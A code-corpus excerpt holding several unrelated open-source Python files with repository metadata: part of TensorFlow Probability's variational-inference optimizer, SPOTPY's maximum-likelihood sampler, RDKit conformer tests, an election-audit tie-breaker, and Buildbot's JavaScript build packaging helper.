index_points = np.array([-10., -7.2, -4., -0.1, 0.1, 4., 6.2, 9.]).reshape(
[-1, 1]).astype(np.float32)
observed_counts = np.array(
[100, 90, 60, 13, 18, 37, 55, 42]).astype(np.float32)
# Trainable GP hyperparameters.
kernel_log_amplitude = tf.Variable(0., name='kernel_log_amplitude')
kernel_log_lengthscale = tf.Variable(0., name='kernel_log_lengthscale')
observation_noise_log_scale = tf.Variable(
0., name='observation_noise_log_scale')
# Generative model.
Root = tfd.JointDistributionCoroutine.Root
def model_fn():
kernel = tfp.math.psd_kernels.ExponentiatedQuadratic(
amplitude=tf.exp(kernel_log_amplitude),
length_scale=tf.exp(kernel_log_lengthscale))
latent_log_rates = yield Root(tfd.GaussianProcess(
kernel,
index_points=index_points,
observation_noise_variance=tf.exp(observation_noise_log_scale),
name='latent_log_rates'))
y = yield tfd.Independent(tfd.Poisson(log_rate=latent_log_rates, name='y'),
reinterpreted_batch_ndims=1)
model = tfd.JointDistributionCoroutine(model_fn)
```
Next we define a variational distribution. We incorporate the observations
directly into the variational model using the 'trick' of representing them
by a deterministic distribution (observe that the true posterior on an
observed value is in fact a point mass at the observed value).
```python
logit_locs = tf.Variable(tf.zeros(observed_counts.shape), name='logit_locs')
logit_softplus_scales = tf.Variable(tf.ones(observed_counts.shape) * -4,
name='logit_softplus_scales')
def variational_model_fn():
latent_rates = yield Root(tfd.Independent(
tfd.Normal(loc=logit_locs, scale=tf.nn.softplus(logit_softplus_scales)),
reinterpreted_batch_ndims=1))
y = yield tfd.VectorDeterministic(observed_counts)
q = tfd.JointDistributionCoroutine(variational_model_fn)
```
Note that here we could apply transforms to variables without using
`DeferredTensor` because the `JointDistributionCoroutine` argument is a
function, i.e., executed "on demand." (The same is true when
distribution-making functions are supplied to `JointDistributionSequential`
and `JointDistributionNamed`.) That is, as long as variables are transformed
*within* the callable, they will appear on the gradient tape when
`q.log_prob()` or `q.sample()` are invoked.
Finally, we fit the variational posterior and model variables jointly: by not
explicitly specifying `trainable_variables`, the optimization will
automatically include all variables accessed. We'll
use a custom `trace_fn` to see how the kernel amplitudes and a set of sampled
latent rates with fixed seed evolve during the course of the optimization:
```python
losses, log_amplitude_path, sample_path = tfp.vi.fit_surrogate_posterior(
target_log_prob_fn=lambda *args: model.log_prob(args),
surrogate_posterior=q,
optimizer=tf.optimizers.Adam(learning_rate=0.1),
sample_size=1,
num_steps=500,
trace_fn=lambda loss, grads, vars: (loss, kernel_log_amplitude,
q.sample(5, seed=42)[0]))
```
#### References
[1]: Christopher M. Bishop. Pattern Recognition and Machine Learning.
Springer, 2006.
[2] Yuri Burda, Roger Grosse, and Ruslan Salakhutdinov. Importance Weighted
Autoencoders. In _International Conference on Learning
Representations_, 2016. https://arxiv.org/abs/1509.00519
[3] Tom Rainforth, Adam R. Kosiorek, Tuan Anh Le, Chris J. Maddison,
Maximilian Igl, Frank Wood, and Yee Whye Teh. Tighter Variational Bounds
are Not Necessarily Better. In _International Conference on Machine
Learning (ICML)_, 2018. https://arxiv.org/abs/1802.04537
"""
if variational_loss_fn is None:
variational_loss_fn = functools.partial(
csiszar_divergence.monte_carlo_variational_loss,
discrepancy_fn=discrepancy_fn,
importance_sample_size=importance_sample_size,
# Silent fallback to score-function gradients leads to
# difficult-to-debug failures, so force reparameterization gradients by
# default.
gradient_estimator=(
csiszar_divergence.GradientEstimators.REPARAMETERIZATION),
)
def complete_variational_loss_fn(seed=None):
return variational_loss_fn(
target_log_prob_fn,
surrogate_posterior,
sample_size=sample_size,
seed=seed)
return tfp_math.minimize(complete_variational_loss_fn,
num_steps=num_steps,
optimizer=optimizer,
convergence_criterion=convergence_criterion,
trace_fn=trace_fn,
trainable_variables=trainable_variables,
jit_compile=jit_compile,
seed=seed,
name=name)
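# A minimal sketch of the migration path suggested by the deprecation notice
# on `fit_surrogate_posterior`: bind the loss arguments with
# `functools.partial` and hand the resulting zero-argument callable directly
# to the generic minimizer. The arguments of this helper are placeholders
# supplied by the caller; nothing below is required by the rest of the module.
def _example_minimize_custom_loss(target_log_prob_fn,
                                  surrogate_posterior,
                                  sample_size=10,
                                  num_steps=100):
  """Illustrative only: minimize a hand-built variational loss."""
  custom_loss_fn = functools.partial(
      csiszar_divergence.monte_carlo_variational_loss,
      target_log_prob_fn=target_log_prob_fn,
      surrogate_posterior=surrogate_posterior,
      sample_size=sample_size)
  # `tfp_math.minimize` repeatedly evaluates the callable and applies the
  # optimizer's updates to the variables the loss depends on.
  return tfp_math.minimize(
      custom_loss_fn,
      num_steps=num_steps,
      optimizer=tf.optimizers.Adam(learning_rate=0.1))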
|
tensorflow/probability
|
tensorflow_probability/python/vi/optimization.py
|
Python
|
apache-2.0
| 34,769
|
[
"Gaussian"
] |
d35d60dea675aa2d09f89bf379057b3dc0dff0ffe40bfa4e40b8c7b0a513f023
|
# -*- coding: utf-8 -*-
'''
Copyright (c) 2015 by Tobias Houska
This file is part of Statistical Parameter Estimation Tool (SPOTPY).
:author: Tobias Houska
This class holds the MaximumLikelihoodEstimation (MLE) algorithm.
'''
from . import _algorithm
import numpy as np
import time
class mle(_algorithm):
'''
Implements the Maximum Likelihood Estimation algorithm.
Input
----------
spot_setup: class
model: function
Should be callable with a parameter combination from the parameter function
and return a list of simulation results (of the same length as the evaluation list)
parameter: function
When called, it should return a random parameter combination, which can
be e.g. uniform or Gaussian
objectivefunction: function
Should return the objective function value for given lists of model simulations and
observations.
evaluation: function
Should return the true values as returned by the model.
dbname: str
* Name of the database where parameter, objectivefunction value and simulation results will be saved.
dbformat: str
* ram: fast, suited for short sampling times; no file will be created and results are saved in an array.
* csv: A csv file will be created, which you can import afterwards.
save_sim: boolean
*True: Simulation results will be saved
*False: Simulation results will not be saved
'''
def __init__(self, spot_setup, dbname=None, dbformat=None, parallel='seq',save_sim=True):
_algorithm.__init__(self,spot_setup, dbname=dbname, dbformat=dbformat, parallel=parallel,save_sim=save_sim)
def check_par_validity(self,par):
if len(par) == len(self.min_bound) and len(par) == len(self.max_bound):
for i in range(len(par)):
if par[i]<self.min_bound[i]:
par[i]=self.min_bound[i]
if par[i]>self.max_bound[i]:
par[i]=self.max_bound[i]
return par
else:
print('ERROR: Bounds do not have the same length as the parameter array')
return par
def sample(self, repetitions):
# Define stepsize of MCMC.
stepsizes = self.parameter()['step'] # array of stepsizes
accepted = 0.0
starttime=time.time()
intervaltime=starttime
self.min_bound, self.max_bound = self.parameter()['minbound'],self.parameter()['maxbound']
# Metropolis-Hastings iterations.
burnIn=int(repetitions/10)
likes=[]
pars=[]
sims=[]
print('burnIn...')
for i in range(burnIn):
par = self.parameter()['random']
pars.append(par)
sim = self.model(par)
sims.append(sim)
like = self.objectivefunction(evaluation = self.evaluation, simulation = sim)
likes.append(like)
self.datawriter.save(like,par,simulations=sim)
self.status(i,like,par)
#Progress bar
acttime=time.time()
#Refresh progressbar every second
if acttime-intervaltime>=2:
text='%i of %i (best like=%g)' % (i,repetitions,self.status.objectivefunction)
print(text)
intervaltime=time.time()
old_like = max(likes)
old_par =pars[likes.index(old_like)]
old_simulations=sims[likes.index(old_like)]
print('Begin Random Walk')
for rep in range(repetitions-burnIn):
# Suggest new candidate from Gaussian proposal distribution.
new_par = []#np.zeros([len(old_par)])
for i in range(len(old_par)):
# Use stepsize provided for every dimension.
new_par.append(np.random.normal(loc=old_par[i], scale=stepsizes[i]))
new_par=self.check_par_validity(new_par)
new_simulations = self.model(new_par)
new_like = self.objectivefunction(evaluation = self.evaluation, simulation=new_simulations)
# Accept new candidate in Monte-Carlo fashion.
if (new_like > old_like):
self.datawriter.save(new_like,new_par,simulations=new_simulations)
accepted = accepted + 1.0 # monitor acceptance
old_par=new_par
old_simulations=new_simulations
old_like=new_like
self.status(rep,new_like,new_par)
else:
self.datawriter.save(old_like,old_par,simulations=old_simulations)
#Progress bar
acttime=time.time()
#Refresh progressbar every second
if acttime-intervaltime>=2:
text='%i of %i (best like=%g)' % (rep+burnIn,repetitions,self.status.objectivefunction)
print(text)
intervaltime=time.time()
try:
self.datawriter.finalize()
except AttributeError: #Happens if no database was assigned
pass
print('End of sampling')
text="Acceptance rate = "+str(accepted/repetitions)
print(text)
text='%i of %i (best like=%g)' % (self.status.rep,repetitions,self.status.objectivefunction)
print(text)
print('Best parameter set:')
print(self.status.params)
text='Duration:'+str(round((acttime-starttime),2))+' s'
print(text)
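# A minimal usage sketch of this sampler. `MyModelSetup` is a hypothetical
# user-defined spot_setup class exposing the model, parameter,
# objectivefunction and evaluation functions described in the class docstring
# above; it is not defined in this module, so the example is left commented.
#
#     sampler = mle(MyModelSetup(), dbname='mle_run', dbformat='csv')
#     sampler.sample(repetitions=5000)
#
# After sampling, the database (named after `dbname`) contains one row per
# repetition with the objective function value, the parameter set and, if
# save_sim is True, the simulation results.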
|
gitporst/spotpy
|
spotpy/algorithms/mle.py
|
Python
|
mit
| 5,553
|
[
"Gaussian"
] |
0ec85855c572dc5db79aee012d9860396e27ce7b2b9996bec004004eb8fca74f
|
# $Id$
#
# Copyright (C) 2004 Rational Discovery LLC
# All Rights Reserved
#
from rdkit import RDConfig
import os,sys
import unittest
from rdkit import Chem
from rdkit.Geometry import Point3D
def feq(v1,v2,tol2=1e-4):
return abs(v1-v2)<=tol2
def ptEq(pt1, pt2, tol=1e-4):
return feq(pt1.x,pt2.x,tol) and feq(pt1.y,pt2.y,tol) and feq(pt1.z,pt2.z,tol)
def addConf(mol):
conf = Chem.Conformer(mol.GetNumAtoms())
for i in range(mol.GetNumAtoms()):
conf.SetAtomPosition(i,(0.,0.,0.))
mol.AddConformer(conf)
mb = Chem.MolToMolBlock(mol)
mb = Chem.MolToMolBlock(mol)
class TestCase(unittest.TestCase):
def setUp(self):
pass
def test0Conformers(self) :
"""Test the conformer data structure"""
mol = Chem.MolFromSmiles("CC")
conf = Chem.Conformer(2)
conf.SetAtomPosition(0, (-0.5, 0.0, 0.0))
conf.SetAtomPosition(1, (1.0, 0.0, 0.0))
conf.SetId(0)
cid = mol.AddConformer(conf)
self.assertTrue(cid == 0)
conf2 = mol.GetConformer(0)
self.assertTrue(conf2.GetId() == cid)
pt1 = conf2.GetAtomPosition(0)
self.assertTrue(ptEq(pt1, Point3D(-0.5, 0.0, 0.0)))
pt2 = conf2.GetAtomPosition(1)
self.assertTrue(ptEq(pt2, Point3D(1.0, 0.0, 0.0)))
#changing conf should not change conf2 - related to issue 217
conf.SetAtomPosition(1, Point3D(2.0, 0.0, 0.0))
pt2 = conf2.GetAtomPosition(1)
self.assertTrue(feq(pt2[0], 1.0))
conf = Chem.Conformer(2)
conf.SetAtomPosition(0, Point3D(-0.5, 0.0, 0.0))
conf.SetAtomPosition(1, Point3D(1.0, 0.0, 0.0))
conf.SetId(2)
cid = mol.AddConformer(conf, 0)
self.assertTrue(cid == 2)
conf3 = mol.GetConformer(2)
def test0AddHds(self) :
mol = Chem.MolFromSmiles("CC")
conf = Chem.Conformer(1)
conf.SetAtomPosition(0, Point3D(-0.5, 0.0, 0.0))
conf.SetAtomPosition(1, Point3D(1.0, 0.0, 0.0))
cid = mol.AddConformer(conf)
conf2 = mol.GetConformer()
self.assertTrue(conf2.GetNumAtoms() == 2)
nmol = Chem.AddHs(mol, 0,1)
conf3 = nmol.GetConformer()
self.assertTrue(conf3.GetNumAtoms() == 8)
self.assertTrue(conf2.GetNumAtoms() == 2)
targetCoords = [[-0.5, 0.0, 0.0],
[1.0, 0.0, 0.0],
[-0.8667, 0.0, 1.03709],
[-0.8667, 0.8981, -0.5185],
[-0.8667, -0.8981, -0.5185],
[1.3667, 0.0, -1.0371],
[1.36667, 0.8981, 0.5185],
[1.36667, -0.8981, 0.5185]]
for i in range(8) :
pt = conf3.GetAtomPosition(i)
self.assertTrue(ptEq(pt, Point3D(*tuple(targetCoords[i]))))
def test2Issue217(self) :
smi = 'c1ccccc1'
m = Chem.MolFromSmiles(smi)
addConf(m)
self.assertTrue(m.GetNumConformers()==1);
mb2 = Chem.MolToMolBlock(m)
def test3Exceptions(self) :
smi = 'c1ccccc1'
m = Chem.MolFromSmiles(smi)
addConf(m)
self.assertTrue(m.GetNumConformers()==1)
self.assertRaises(ValueError,lambda:m.GetConformer(2))
def test4ConfTuple(self):
smi = 'c1ccccc1'
m = Chem.MolFromSmiles(smi)
for i in range(10):
addConf(m)
confs = m.GetConformers()
self.assertTrue(len(confs) == 10)
for conf in confs:
for i in range(6):
pt = conf.GetAtomPosition(i)
self.assertTrue(ptEq(pt, Point3D(0.0, 0.0, 0.0)))
m.RemoveAllConformers()
self.assertTrue(m.GetNumConformers() == 0)
confs = m.GetConformers()
self.assertTrue(confs == ())
if __name__ == '__main__':
unittest.main()
|
soerendip42/rdkit
|
Code/GraphMol/Wrap/testConformer.py
|
Python
|
bsd-3-clause
| 3,539
|
[
"RDKit"
] |
4922143632fa2168228ad0066728ea1284dfbf0e5b1d024026ab4518d74c0a48
|
"""
Module: audit_tie_breaker
Author: Berj K. Chilingirian
Date: 7 August 2016
Description:
The Australian Senate Election (ASE) may require an Australian Election
Official (AEO) to break a tie. There are three cases in which ties must
be broken manually by an AEO:
Case 1:
If multiple candidates hold the same number of votes and that
number is greater than the quota, then a previous round in which
those candidates held a differing number of votes is used to
determine the election order. If no such round exists, the AEO
determines a permutation of candidate IDs, specifying the order
in which those candidates are elected.
Case 2:
If there are two final continuing candidates, with one remaining
vacancy, and both candidates hold the same number of votes, the
AEO decides which candidate is elected.
Case 3:
If a candidate must be excluded, then the lowest number of votes
held by any candidate is found. If multiple candidates hold that
number of votes, the same tie breaker system in (1) is used. If
that fails, the AEO decides what candidate is excluded.
We want our auditing procedures to be as consistent as possible with the
real ASE. However, the Commonwealth Electoral Act of 1981 does not specify
the tie-breaking procedure of an AEO. Thus, we use tie-breaking information
from the real election to resolve ties encountered during our audit.
To do this, we:
(1) Ingest tie-breaking information (JSON) from the real ASE.
.. code-block:: json
{
    "events": [
        [17, ["A", "B", "C"], "B", 2],
        [21, ["D", "E", "F"], ["E", "F", "D"], 1]
    ]
}
where the 4-tuple represents the
RoundNm - The round in which the tie-breaking event
occurred.
CandidateIds - The candidate IDs involved in the tie-breaking
event.
Resolution - The resolution for the tie-breaking event. May
be either a single candidate ID (cases 2, 3)
or a permutation of the candidate IDs involved
in the tie-breaking event (case 1).
CaseNm - The case number identifying the type of tie-breaking
event (corresponds to the cases described above).
(2) Construct a directed, acyclic graph where a directed edge from A to B
represents situations where A is elected over B (cases 1, 2) or B is
excluded (case 3). Note that more than one edge may be created by a
given tie-breaking event.
(3) Sort the vertices into a linear order using a random topological sort.
(4) Use the linear ordering discovered in Step 3 to break all ties
encountered during the audit. In other words, given candidate IDs A and
B, prefer electing/not-excluding the candidate earlier in the linear
order.
Usage:
.. code-block:: python3
>>> import audit_tie_breaker
>>> atb = AuditTieBreaker(['A', 'B', 'C', 'D', 'E', 'F', 'G'], verbose=True)
>>> atb.load_events('contest_tie_breaking_events.json')
= Building Audit Tie-Breaking Graph...
- Case 1: Added edge B->C.
- Case 1: Added edge B->A.
- Case 1: Added edge C->A.
- Case 3: Added edge D->E.
- Case 3: Added edge F->E.
- Case 2: Added edge G->D.
--> Linear order determined as B, C, A, F, G, D, E.
= Verifying linear order is consistent with real election's tie-breaking events...
- Tie between ['A', 'B', 'C'] broken with ['B', 'C', 'A'] for case 1.
- Tie between ['D', 'E', 'F'] broken with E for case 3.
- Tie between ['D', 'G'] broken with G for case 2.
--> Linear order is consistent with real election's tie-breaking events.
>>> atb.break_tie(['A', 'B', 'C'], 1)
- Tie between ['A', 'B', 'C'] broken with ['B', 'C', 'A'] for case 1.
"""
import itertools
import json
import os
import random
import sys
class AuditTieBreaker(object):
""" Implements a class for breaking ties encountered during an audit.
:ivar _vertices: A mapping from a vertex in the audit tie breaking graph to its
neighbors.
:vartype _vertices: dict
:ivar _print_fn: A function which takes a string as input and writes it to the
appropriate file.
:vartype _print_fn: function
:ivar _linear_order: A linear ordering of the candidate IDs of all candidates in
the contest being audited. The linear ordering is represented as a mapping
from a candidate ID to its position in the linear order.
:vartype _linear_order: dict
"""
READ_OPT = 'r'
WRITE_OPT = 'w'
COMMA_DELIM = ', '
EVENTS_KEY = 'events'
EVENTS_FILE_ERROR_MSG = 'The file {0} is not formatted correctly. Expected: \
{{ \'events\': [(<RoundNumber>, <CandidateIDs>, <Resolution>, <CaseNm>),]}}'
BUILDING_GRAPH_MSG = '= Building Audit Tie-Breaking Graph...'
ADDED_EDGE_MSG = ' - Case {0}: Added edge {1}->{2}.'
LINEAR_ORDER_MSG = ' --> Linear order determined as {0}.'
VERIFY_LINEAR_ORDER_MSG = '\n= Verifying linear order is consistent with real election\'s tie-breaking events...'
IS_CONSISTENT_MSG = ' --> Linear order is consistent with real election\'s tie-breaking events.\n'
TIE_BREAK_MSG = ' - Tie between {0} broken with {1} for case {2}.'
def __init__(self, candidate_ids, seed=1, verbose=False, out_f=None):
""" Initializes the `AuditTieBreaker` object.
:param candidate_ids: A list of the candidate IDs of all candidates in the
election contest.
:type candidate_ids: list
:param verbose: A flag indicating whether or not the `AuditTieBreaker`
object should be verbose when loading data/breaking ties.
:type verbose: bool
:param seed: An integer specifying the random seed to use when determining
the random topological sort of the candidate IDs of all candidates in
the election (default: 1).
:type seed: int
:param out_f: A string representing the name of a file to write all debug
information to (default: stdout). Only used when `verbose` is true.
:type out_f: str
"""
random.seed(seed)
self._vertices = {candidate_id : [] for candidate_id in candidate_ids}
self._print_fn = AuditTieBreaker._setup_print_fn(out_f) if verbose else lambda x : None
self._linear_order = {}
@staticmethod
def _setup_print_fn(out_f):
""" Returns a function to be used for writing verbose information.
:param out_f: A string representing the name of a file to write all debug
information to.
:type out_f: str
:return: A function which takes a string as input and writes it to the
appropriate file.
:rtype: function
"""
if out_f is not None:
sys.stdout = open(out_f, AuditTieBreaker.WRITE_OPT)
return lambda x : print(x)
def _visit(self, v, linear_order):
""" Explores the neighbors of the given node recursively and then adds the
explored node to the head of the linear order.
:param v: A candidate ID.
:type v: str or int
:param linear_order: The linear order of candidate IDs so far.
:type linear_order: list
"""
if v in linear_order:
# Do not explore a node twice.
return
random.shuffle(self._vertices[v])
for u in self._vertices[v]:
self._visit(u, linear_order)
linear_order.insert(0, v)
def load_events(self, events_f):
""" Loads all tie-breaking events specified in `events_f`.
:param events_f: A string representing the name of a file to read all tie-
breaking events from.
:type events_f: str
"""
# Read tie-breaking events from JSON file.
with open(events_f, AuditTieBreaker.READ_OPT) as json_file:
events = json.load(json_file).get(AuditTieBreaker.EVENTS_KEY)
if events is None:
raise Exception(AuditTieBreaker.EVENTS_FILE_ERROR_MSG.format(events_f))
# Construct audit tie-breaking graph.
self._print_fn(AuditTieBreaker.BUILDING_GRAPH_MSG)
for event in events:
try:
round_num, candidate_ids, resolution, case_num = event
except:
raise Exception(AuditTieBreaker.EVENTS_FILE_ERROR_MSG.format(events_f))
if len(resolution) == 1:
# Cases 2, 3 - `resolution` is a single candidate ID.
if case_num == 2:
for cid in candidate_ids:
if cid != resolution:
self._vertices[resolution].append(cid)
self._print_fn(AuditTieBreaker.ADDED_EDGE_MSG.format(2, resolution, cid))
else:
for cid in candidate_ids:
if cid != resolution:
self._vertices[cid].append(resolution)
self._print_fn(AuditTieBreaker.ADDED_EDGE_MSG.format(3, cid, resolution))
else:
# Case 1 - `resolution` is a permutation of candidate IDs.
for src_cid, dest_cid in itertools.combinations(resolution, 2):
self._vertices[src_cid].append(dest_cid)
self._print_fn(AuditTieBreaker.ADDED_EDGE_MSG.format(1, src_cid, dest_cid))
# Determine a random topological sorting of the vertices in the audit tie-breaking graph.
vertices = sorted(self._vertices.keys())
random.shuffle(vertices)
linear_order = []
for v in vertices:
self._visit(v, linear_order)
self._linear_order = {linear_order[i] : i for i in range(len(linear_order))}
self._print_fn(AuditTieBreaker.LINEAR_ORDER_MSG.format(AuditTieBreaker.COMMA_DELIM.join(linear_order)))
# Verify linear order is consistent with the real election's tie-breaking events.
self._print_fn(AuditTieBreaker.VERIFY_LINEAR_ORDER_MSG)
for event in events:
round_num, candidate_ids, resolution, case_num = event
assert self.break_tie(candidate_ids, case_num) == resolution
self._print_fn(AuditTieBreaker.IS_CONSISTENT_MSG)
def break_tie(self, candidate_ids, case_num):
""" Returns the resolution for the given candidate IDs and case number.
:param candidate_ids: A list of candidate IDs.
:type candidate_ids: list
:param case_num: An integer identifying the tie-breaking case.
:type case_num: int
:return: The resolution for the given candidate IDs and case number.
:rtype: A single candidate ID (cases 2, 3) or a permutation of the given candidate IDs
(case 1).
"""
cids_to_order = {cid : self._linear_order[cid] for cid in candidate_ids}
resolution = sorted(cids_to_order, key=cids_to_order.__getitem__)
result = resolution # Get permutation of candidates.
if case_num == 2:
result = resolution[0] # Get candidate to elect.
elif case_num == 3:
result = resolution[-1] # Get candidate to exclude.
self._print_fn(AuditTieBreaker.TIE_BREAK_MSG.format(candidate_ids, result, case_num))
return result
def test_audit_tie_breaker():
""" Tests the `AuditTieBreaker` implementation. """
# Setup tie-breaking events JSON to test implementation.
TMP_TEST_EVENTS_JSON = 'tmp_test_tie_breaking_events.json'
events = {
'events': [
(1, ['A', 'B', 'C'], ['B', 'C', 'A'], 1),
(7, ['D', 'E', 'F'], 'E', 3),
(12, ['D', 'G'], 'G', 2),
],
}
with open(TMP_TEST_EVENTS_JSON, 'w') as f:
f.write(json.dumps(events))
# Test `AuditTieBreaker` implementation.
audit_tb = AuditTieBreaker(['A', 'B', 'C', 'D', 'E', 'F', 'G'], verbose=True)
audit_tb.load_events(TMP_TEST_EVENTS_JSON)
audit_tb._print_fn('= Running AuditTieBreaker tests...')
assert audit_tb.break_tie(['A', 'B', 'C'], 1) == ['B', 'C', 'A']
assert audit_tb.break_tie(['D', 'E', 'F'], 3) == 'E'
assert audit_tb.break_tie(['D', 'G'], 2) == 'G'
assert audit_tb.break_tie(['B', 'F'], 2) == 'B' # Test depends on random.seed of 1.
assert audit_tb.break_tie(['B', 'F'], 3) == 'F' # Test depends on random.seed of 1.
# Clean up temporary test data file.
os.unlink(TMP_TEST_EVENTS_JSON)
audit_tb._print_fn(' --> Tests PASSED!')
test_audit_tie_breaker() # Runs AuditTieBreaker Tests.
|
ron-rivest/2016-aus-senate-audit
|
rivest/audit_tie_breaker.py
|
Python
|
apache-2.0
| 13,136
|
[
"ASE"
] |
a23eac3bc113f45eb9cb463a0a72dec3089ea027593adcb0c8d9aa71a04a4592
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
# Method to add build step taken from here
# https://seasonofcode.com/posts/how-to-add-custom-build-steps-and-commands-to-setuppy.html
import datetime
import distutils.cmd
import os
import re
import subprocess
import sys
from distutils.version import LooseVersion
from subprocess import PIPE
from subprocess import STDOUT
from subprocess import Popen
import setuptools.command.build_py
import setuptools.command.egg_info
from setuptools import setup
old_listdir = os.listdir
def listdir(path):
# patch listdir to avoid looking into node_modules
l = old_listdir(path)
if "node_modules" in l:
l.remove("node_modules")
return l
os.listdir = listdir
def check_output(cmd):
"""Version of check_output which does not throw error"""
popen = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = popen.communicate()[0].strip()
if not isinstance(out, str):
out = out.decode(sys.stdout.encoding)
return out
def gitDescribeToPep440(version):
# git describe produces versions in the form: v0.9.8-20-gf0f45ca
# where 20 is the number of commits since the last release, and gf0f45ca is the short commit id preceded by 'g'
# we parse this and transform it into a PEP 440 release version 0.9.9.dev20 (increment the last digit and add dev before 20)
VERSION_MATCH = re.compile(r'(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+)(\.post(?P<post>\d+))?(-(?P<dev>\d+))?(-g(?P<commit>.+))?')
v = VERSION_MATCH.search(version)
if v:
major = int(v.group('major'))
minor = int(v.group('minor'))
patch = int(v.group('patch'))
if v.group('dev'):
patch += 1
dev = int(v.group('dev'))
return "{}.{}.{}-dev{}".format(major, minor, patch, dev)
if v.group('post'):
return "{}.{}.{}.post{}".format(major, minor, patch, v.group('post'))
return "{}.{}.{}".format(major, minor, patch)
return v
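# A few illustrative input/output pairs for the transform above (a sketch;
# real inputs come from `git describe --tags --always`):
#   gitDescribeToPep440("v0.9.8")             -> "0.9.8"
#   gitDescribeToPep440("v0.9.8-20-gf0f45ca") -> "0.9.9-dev20"
#   gitDescribeToPep440("v0.9.8.post2")       -> "0.9.8.post2"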
def mTimeVersion(init_file):
cwd = os.path.dirname(os.path.abspath(init_file))
m = 0
for root, dirs, files in os.walk(cwd):
for f in files:
m = max(os.path.getmtime(os.path.join(root, f)), m)
d = datetime.datetime.utcfromtimestamp(m)
return d.strftime("%Y.%m.%d")
def getVersionFromArchiveId(git_archive_id='$Format:%ct %d$'):
""" Extract the tag if a source is from git archive.
When source is exported via `git archive`, the git_archive_id init value is modified
and placeholders are expanded to the "archived" revision:
%ct: committer date, UNIX timestamp
%d: ref names, like the --decorate option of git-log
See man gitattributes(5) and git-log(1) (PRETTY FORMATS) for more details.
"""
# mangle the magic string to make sure it is not replaced by git archive
if not git_archive_id.startswith('$For''mat:'):
# source was modified by git archive, try to parse the version from
# the value of git_archive_id
match = re.search(r'tag:\s*v([^,)]+)', git_archive_id)
if match:
# archived revision is tagged, use the tag
return gitDescribeToPep440(match.group(1))
# archived revision is not tagged, use the commit date
tstamp = git_archive_id.strip().split()[0]
d = datetime.datetime.utcfromtimestamp(int(tstamp))
return d.strftime('%Y.%m.%d')
return None
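# Sketch of how the archive-id value maps to a version (the timestamp and
# refs below are hypothetical examples):
#   '$Format:%ct %d$'                           -> None   (not a git archive)
#   '1514469239 (HEAD -> master, tag: v1.0.0)'  -> '1.0.0' (tagged revision)
#   '1514469239 (HEAD -> master)'               -> '2017.12.28' (commit date)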
def getVersion(init_file):
"""
Return BUILDBOT_VERSION environment variable, content of VERSION file, git
tag or 'latest'
"""
try:
return os.environ['BUILDBOT_VERSION']
except KeyError:
pass
try:
cwd = os.path.dirname(os.path.abspath(init_file))
fn = os.path.join(cwd, 'VERSION')
with open(fn) as f:
return f.read().strip()
except IOError:
pass
version = getVersionFromArchiveId()
if version is not None:
return version
try:
p = Popen(['git', 'describe', '--tags', '--always'], stdout=PIPE, stderr=STDOUT, cwd=cwd)
out = p.communicate()[0]
if (not p.returncode) and out:
v = gitDescribeToPep440(str(out))
if v:
return v
except OSError:
pass
try:
# if we really can't find the version, we use the date of modification of the most recent file
# docker hub builds cannot use git describe
return mTimeVersion(init_file)
except Exception:
# bummer. lets report something
return "latest"
# JS build strategy:
#
# Obviously, building javascript is not something setuptools supports out of the box
#
# The goals of this hack are:
# - override the distutils commands to insert our JS build
# - keep the plugin's setup.py very small
#
# from buildbot_pkg import setup_www
#
# setup_www(
# ...
# packages=["buildbot_myplugin"]
# )
#
# We need to override the first command done, so that source tree is populated very soon,
# as well as version is found from git tree or "VERSION" file
#
# This supports the following setup.py commands:
#
# - develop, via egg_info
# - install, via egg_info
# - sdist, via egg_info
# - bdist_wheel, via build
# This is why we override both egg_info and build_py, and whichever runs
# first builds the JS.
class BuildJsCommand(distutils.cmd.Command):
"""A custom command to run JS build."""
description = 'run JS build'
already_run = False
def initialize_options(self):
"""Set default values for options."""
def finalize_options(self):
"""Post-process options."""
def run(self):
"""Run command."""
if self.already_run:
return
package = self.distribution.packages[0]
if os.path.exists("gulpfile.js") or os.path.exists("webpack.config.js"):
yarn_version = check_output("yarn --version")
assert yarn_version != "", "need nodejs and yarn installed in current PATH"
yarn_bin = check_output("yarn bin").strip()
commands = []
commands.append(['yarn', 'install', '--pure-lockfile'])
if os.path.exists("gulpfile.js"):
commands.append([os.path.join(yarn_bin, "gulp"), 'prod', '--notests'])
elif os.path.exists("webpack.config.js"):
commands.append(['yarn', 'run', 'build'])
shell = bool(os.name == 'nt')
for command in commands:
self.announce('Running command: {}'.format(str(" ".join(command))),
level=distutils.log.INFO)
subprocess.check_call(command, shell=shell)
self.copy_tree(os.path.join(package, 'static'), os.path.join(
"build", "lib", package, "static"))
with open(os.path.join("build", "lib", package, "VERSION"), "w") as f:
f.write(self.distribution.metadata.version)
with open(os.path.join(package, "VERSION"), "w") as f:
f.write(self.distribution.metadata.version)
self.already_run = True
class BuildPyCommand(setuptools.command.build_py.build_py):
"""Custom build command."""
def run(self):
self.run_command('build_js')
super().run()
class EggInfoCommand(setuptools.command.egg_info.egg_info):
"""Custom egginfo command."""
def run(self):
self.run_command('build_js')
super().run()
def setup_www_plugin(**kw):
package = kw['packages'][0]
if 'version' not in kw:
kw['version'] = getVersion(os.path.join(package, "__init__.py"))
setup(cmdclass=dict(
egg_info=EggInfoCommand,
build_py=BuildPyCommand,
build_js=BuildJsCommand),
**kw)
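# A minimal plugin setup.py sketch using the helper above. The package name,
# description and entry point are hypothetical and only illustrate the
# pattern shown in the comment block near the top of this file:
#
#     from buildbot_pkg import setup_www_plugin
#
#     setup_www_plugin(
#         name='buildbot-myplugin',
#         description='my buildbot www plugin',
#         packages=['buildbot_myplugin'],
#         entry_points={'buildbot.www': ['myplugin = buildbot_myplugin:ep']},
#     )
#
# Because `version` is omitted, getVersion() derives it from BUILDBOT_VERSION,
# a VERSION file, `git describe`, or file modification times, in that order.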
|
anish/buildbot
|
pkg/buildbot_pkg.py
|
Python
|
gpl-2.0
| 8,359
|
[
"GULP"
] |
